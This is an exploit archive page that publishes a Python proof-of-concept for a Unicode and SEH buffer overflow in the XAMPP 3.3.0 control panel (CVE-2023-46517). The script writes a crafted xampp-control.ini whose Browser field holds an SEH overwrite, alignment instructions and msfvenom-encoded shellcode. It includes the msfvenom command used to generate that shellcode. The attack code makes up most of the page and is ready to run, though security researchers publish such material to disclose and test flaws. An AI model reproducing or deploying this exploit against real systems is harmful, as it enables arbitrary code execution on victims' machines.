exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

XAMPP 3.3.0 Buffer Overflow

XAMPP 3.3.0 Buffer Overflow
Posted Oct 27, 2023
Authored by Talson

XAMPP version 3.3.0 .ini unicode + SEH buffer overflow exploit.

tags | exploit, overflow
advisories | CVE-2023-46517
SHA-256 | 1ca692b072e3e08fac192c7f2fc261d0ac4feb8be639620958ba27b295c9541f

XAMPP 3.3.0 Buffer Overflow

Change Mirror Download
# Exploit Title: XAMPP v3.3.0 — '.ini' Buffer Overflow (Unicode + SEH)
# Date: 2023-10-26
# Author: Talson (@Ripp3rdoc)
# Software Link: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/8.0.28/xampp-windows-x64-8.0.28-0-VS16-installer.exe
# Version: 3.3.0
# Tested on: Windows 11
# CVE-2023-46517

##########################################################
# _________ _______ _ _______ _______ _ #
# \__ __/( ___ )( \ ( ____ \( ___ )( ( /| #
# ) ( | ( ) || ( | ( \/| ( ) || \ ( | #
# | | | (___) || | | (_____ | | | || \ | | #
# | | | ___ || | (_____ )| | | || (\ \) | #
# | | | ( ) || | ) || | | || | \ | #
# | | | ) ( || (____/\/\____) || (___) || ) \ | #
# )_( |/ \|(_______/\_______)(_______)|/ )_) #
# #
##########################################################

# Proof of Concept:

# 1.- Run the python script "poc.py", it will create a new file "xampp-control.ini"
# 2.- Open the application (xampp-control.exe)
# 3.- Click on the "admin" button in front of Apache service.
# 4.- Profit

# Proof-of-Concept code on GitHub: https://github.com/ripp3rdoc/XAMPPv3.3.0-BOF/

# Greetingz to EMU TEAM (¬‿¬)⩙

from pwn import *
import shutil
import os.path

buffer = "\x41" * 268 # 268 bytes to fill the buffer
nseh = "\x59\x71" # next SEH address — 0x00590071 (a harmless padding)
seh = "\x15\x43" # SEH handler — 0x00430015: pop ecx ; pop ebp ; ret ;
padd = "\x71" * 0x55 # padding

eax_align = "\x47" # venetian pad/align
eax_align += "\x51" # push ecx
eax_align += "\x71" # venetian pad/align
eax_align += "\x58" # pop eax -> eax = 0019e1a0
eax_align += "\x71" # venetian pad/align
eax_align += "\x05\x24\x11" # add eax,0x11002300
eax_align += "\x71" # venetian pad/align
eax_align += "\x2d\x11\x11" # sub eax,0x11001100 -> eax = 0019F3DC
eax_align += "\x71" # venetian pad/align
eax_align += "\x50" # push eax
eax_align += "\x71" # pad to align the following ret
eax_align += "\xc3"; # ret into eax?

# msfvenom -p windows/exec CMD=calc.exe -e x86/unicode_mixed -f raw EXITFUNC=thread BufferRegister=EAX -o shellcode.bin
# Payload size: 512 bytes
shellcode = (
"PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1"
"AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBkLzHrbM0ipm0c0bi7u01Ep1TBkb0nPdKR2zlrknrKdDK42Kx"
"Jo6WpJnFLqiofLMl1QallBLlO0gQxOzmjagW7rZRObpWBkNrZpdKMzmlBkNlzq1hZC0HKQwab1dKQIKp9qiCrk"
"myKhGslzoYtKMdTKkQJ6ma9odlgQ8OJmM1vg08iPD5yfjcSMjXOKQmnDRUhdaH4KR8mTIq7c2FDKjlpKrkaHML"
"JaZ3dKItrkYqhPU9MtO4KtOk1KC1QI1JNqKO9P1OOoqJtKn2HkRmOmaZjatMbe7BYpm0kPR0PhmadKRODGioj57"
"KgpmMnJZjoxDfceemCmYo9EmlivcL9zE0ikWpQe9ugKoWKcprpo2Jip23KOHUQSaQ0l33Lns5PxrEKPAA"
)

shellcode = buffer + nseh + seh + eax_align + padd + shellcode


check_file = os.path.isfile("c:\\xampp\\xampp-control.ini")

if check_file:

print("[!] Backup file found. Generating the POC file...")
pass
else:
# create backup
try:
shutil.copyfile("c:\\xampp\\xampp-control.ini", "c:\\xampp\\xampp-control.ini.bak")
print("[+] Creating backup for xampp-control.ini...")
print("[+] Backup file created!")
except Exception as e:
print("[!] Failed creating a backup for xampp-control.ini: ", e)

try:

# Create the new file
with open("c:\\xampp\\xampp-control.ini", "w", encoding='utf-8') as file:
file.write(f"""[Common]
Edition=
Editor=
Browser={shellcode}

Debug=0
Debuglevel=0
Language=en
TomcatVisible=1
Minimized=0

[LogSettings]
Font=Arial
FontSize=10

[WindowSettings]
Left=-1
Top=-1
Width=682
Height=441

[Autostart]
Apache=0
MySQL=0
FileZilla=0
Mercury=0
Tomcat=0

[Checks]
CheckRuntimes=1
CheckDefaultPorts=1

[ModuleNames]
Apache=Apache
MySQL=MySQL
Mercury=Mercury
Tomcat=Tomcat

[EnableModules]
Apache=1
MySQL=1
FileZilla=1
Mercury=1
Tomcat=1

[EnableServices]
Apache=1
MySQL=1
FileZilla=1
Tomcat=1

[BinaryNames]
Apache=httpd.exe
MySQL=mysqld.exe
FileZilla=filezillaserver.exe
FileZillaAdmin=filezilla server interface.exe
Mercury=mercury.exe
Tomcat=tomcat8.exe

[ServiceNames]
Apache=Apache2.4
MySQL=mysql
FileZilla=FileZillaServer
Tomcat=Tomcat
[ServicePorts]
Apache=80
ApacheSSL=443
MySQL=3306
FileZilla=21
FileZill=14147
Mercury1=25
Mercury2=79
Mercury3=105
Mercury4=106
Mercury5=110
Mercury6=143
Mercury7=2224
TomcatHTTP=8080
TomcatAJP=8009
Tomcat=8005
[UserConfigs]
Apache=
MySQL=
FileZilla=
Mercury=
Tomcat=

[UserLogs]
Apache=
MySQL=
FileZilla=
Mercury=
Tomcat=
""")
print("[+] Created the POC!")

except Exception as e:
print("[!] Failed creating the POC xampp-control.ini: ", e)
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close